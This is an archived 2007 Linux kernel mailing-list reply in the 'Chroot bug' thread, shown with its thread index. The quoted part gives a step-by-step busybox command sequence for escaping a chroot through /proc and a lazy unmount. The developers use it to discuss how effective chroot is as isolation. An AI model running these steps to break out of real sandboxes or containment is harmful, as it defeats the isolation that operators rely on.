From: Miloslav Semler <majkls@prepere.com>
To: Kyle Moffett <mrmacman_g4@mac.com>
Cc: David Newall <david@davidnewall.com>,
Adrian Bunk <bunk@kernel.org>,
Alan Cox <alan@lxorguk.ukuu.org.uk>,
"Serge E. Hallyn" <serge@hallyn.com>,
Bill Davidsen <davidsen@tmr.com>,
Philipp Marek <philipp@marek.priv.at>,
7eggert@gmx.de, bunk@fs.tum.de, linux-kernel@vger.kernel.org
Subject: Re: Chroot bug
Date: Wed, 26 Sep 2007 17:01:36 +0200 [thread overview]
Message-ID: <46FA7450.5020707@prepere.com> (raw)
In-Reply-To: <73A0FA2C-7202-4E5C-9521-C2BC7026DE3B@mac.com>
>
> This is basically both painfully racy and easily broken with umount
> and/or access to proc. See this busybox-compatible example:
>
> ## Set up chroot
> mkdir /root1
> mount -o mode=0750 -t tmpfs tmpfs /root1
> cp -a /bin/busybox /root1/busybox
>
> ## Enter chroot
> chroot /root1 /busybox
>
> ## Mount proc
> /busybox mkdir /proc
> /busybox mount -t proc proc /proc
>
> ## Poke around root filesystem (this may be all you need)
> /busybox ls /proc/1/root/
>
> ## Detach our chroot so we're no longer a sub-directory
> /busybox umount -l /proc/1/root/root1
>
> ## Now we can easily chroot to the original root, since it isn't in
> our ".." path
> exec /busybox chroot /proc/1/root /bin/sh
>
>
> See how easy that is? Unless you stick the above parent-directory
> check (which is still racy against directories being moved around) for
> *EVERY* directory component of *EVERY* open/chdir-ish syscall, you are
> still going to be easily worked around through many different methods.
>
so there is no discussion about mount & others. I think, if you have
CAP_SYS_MOUNT/CAP_SYS_ADMIN, you need not solve chroot() and how to
break it.
next prev parent reply other threads:[~2007-09-26 15:01 UTC|newest]
Thread overview: 63+ messages / expand[flat|nested] mbox.gz Atom feed top
[not found] <952DN-83o-31@gated-at.bofh.it>
[not found] ` <954cl-29C-3@gated-at.bofh.it>
[not found] ` <95ctn-74b-15@gated-at.bofh.it>
[not found] ` <95cMH-7um-19@gated-at.bofh.it>
[not found] ` <95gdA-4OZ-7@gated-at.bofh.it>
2007-09-20 11:13 ` sys_chroot+sys_fchdir Fix Bodo Eggert
2007-09-20 11:59 ` Philipp Marek
2007-09-20 12:52 ` majkls
2007-09-20 16:06 ` David Newall
2007-09-20 16:17 ` Philipp Marek
2007-09-20 18:02 ` David Newall
2007-09-20 20:53 ` Bill Davidsen
2007-09-21 8:29 ` David Newall
2007-09-24 21:32 ` Serge E. Hallyn
2007-09-24 22:04 ` David Newall
2007-09-24 23:00 ` Serge E. Hallyn
2007-09-25 7:45 ` David Newall
2007-09-25 11:49 ` Serge E. Hallyn
2007-09-25 13:58 ` David Newall
2007-09-25 15:10 ` Chroot bug (was: sys_chroot+sys_fchdir Fix) David Newall
2007-09-25 15:20 ` Jan Engelhardt
2007-09-25 15:39 ` Chroot bug Miloslav Semler
2007-09-25 15:41 ` David Newall
2007-09-25 15:48 ` Jan Engelhardt
2007-09-25 16:19 ` Miloslav Semler
2007-09-25 16:52 ` Jan Engelhardt
2007-09-25 17:00 ` Miloslav Semler
2007-09-25 17:05 ` Jan Engelhardt
2007-09-25 17:09 ` Miloslav Semler
2007-09-25 17:09 ` Al Viro
2007-09-25 17:19 ` Miloslav Semler
2007-09-25 16:53 ` Serge E. Hallyn
2007-09-25 20:51 ` David Newall
2007-09-25 15:30 ` Chroot bug (was: sys_chroot+sys_fchdir Fix) Alan Cox
2007-09-25 15:35 ` Chroot bug David Newall
2007-09-25 15:48 ` Alan Cox
2007-09-25 15:47 ` Jan Engelhardt
2007-09-25 23:50 ` David Newall
2007-09-26 0:18 ` Alan Cox
2007-09-26 10:24 ` David Newall
2007-09-26 10:47 ` Alan Cox
2007-09-26 11:06 ` David Newall
2007-09-26 11:20 ` Alan Cox
[not found] ` <46FA41B4.9040104@prepere.com>
[not found] ` <20070926123522.54ffd56f@the-village.bc.nu>
2007-09-26 11:34 ` Miloslav Semler
2007-09-26 14:09 ` Alan Cox
2007-09-26 13:13 ` Bongani Hlope
2007-09-26 0:55 ` Adrian Bunk
2007-09-26 5:21 ` Kyle Moffett
2007-09-26 5:25 ` Willy Tarreau
2007-09-26 10:27 ` David Newall
2007-09-26 10:45 ` Olivier Galibert
2007-09-26 11:13 ` David Newall
2007-09-26 13:18 ` linux-os (Dick Johnson)
2007-09-26 15:02 ` Olivier Galibert
2007-09-26 12:54 ` Kyle Moffett
2007-09-26 13:11 ` Miloslav Semler
2007-09-26 13:42 ` Al Viro
2007-09-26 14:51 ` Miloslav Semler
2007-09-26 14:02 ` Kyle Moffett
2007-09-26 15:01 ` Miloslav Semler [this message]
2007-09-27 13:49 ` Jiri Kosina
2007-09-25 16:33 ` Arjan van de Ven
2007-09-25 15:32 ` Chroot bug (was: sys_chroot+sys_fchdir Fix) Adrian Bunk
2007-09-25 15:43 ` Chroot bug Miloslav Semler
2007-09-25 16:02 ` Adrian Bunk
2007-09-26 19:23 ` Chroot bug (was: sys_chroot+sys_fchdir Fix) Bodo Eggert
2007-09-24 23:02 ` sys_chroot+sys_fchdir Fix Serge E. Hallyn
[not found] ` <95UE2-1oR-19@gated-at.bofh.it>
[not found] ` <95V72-2ly-17@gated-at.bofh.it>
[not found] ` <97pG8-3B5-47@gated-at.bofh.it>
[not found] ` <97sX2-p1-3@gated-at.bofh.it>
2007-09-26 9:38 ` Nick Craig-Wood
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=46FA7450.5020707@prepere.com \
--to=majkls@prepere.com \
--cc=7eggert@gmx.de \
--cc=alan@lxorguk.ukuu.org.uk \
--cc=bunk@fs.tum.de \
--cc=bunk@kernel.org \
--cc=david@davidnewall.com \
--cc=davidsen@tmr.com \
--cc=linux-kernel@vger.kernel.org \
--cc=mrmacman_g4@mac.com \
--cc=philipp@marek.priv.at \
--cc=serge@hallyn.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox